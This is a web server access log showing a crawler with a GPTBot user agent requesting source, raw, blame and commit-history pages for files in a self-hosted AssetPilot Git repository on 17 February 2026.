"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app" +[17/Feb/2026:13:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static" +[17/Feb/2026:13:33:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 229] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" +[17/Feb/2026:13:33:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 16390] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:33:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" +[17/Feb/2026:13:33:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 5799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 11538] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv" +[17/Feb/2026:13:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 11748] [Gzip 6.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" +[17/Feb/2026:13:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:13:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 11666] [Gzip 4.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" +[17/Feb/2026:13:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 12858] [Gzip 6.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:13:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" +[17/Feb/2026:13:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:13:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" +[17/Feb/2026:13:33:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 15823] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" +[17/Feb/2026:13:33:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" +[17/Feb/2026:13:33:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 23747] [Gzip 15.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:13:33:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 11536] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 11548] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 11537] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 8147] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:13:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 10009] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static" +[17/Feb/2026:13:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" +[17/Feb/2026:13:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" +[17/Feb/2026:13:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates" +[17/Feb/2026:13:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 15262] [Gzip 8.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" +[17/Feb/2026:13:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 21523] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" +[17/Feb/2026:13:33:32 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" +[17/Feb/2026:13:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 10423] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:13:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:13:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:13:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:13:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 16639] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app" +[17/Feb/2026:13:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13369] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app" +[17/Feb/2026:13:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9961] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:13:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app" +[17/Feb/2026:13:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13510] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" +[17/Feb/2026:13:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 9187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" +[17/Feb/2026:13:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 23753] [Gzip 11.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" +[17/Feb/2026:13:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" +[17/Feb/2026:13:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js" +[17/Feb/2026:13:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:13:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" [Client 74.7.227.38] [Length 10163] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" +[17/Feb/2026:13:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 17039] [Gzip 8.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:13:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13131] [Gzip 6.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" +[17/Feb/2026:13:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 4934] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:13:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 2169] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" +[17/Feb/2026:13:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13181] [Gzip 6.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:13:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 1689] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:13:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 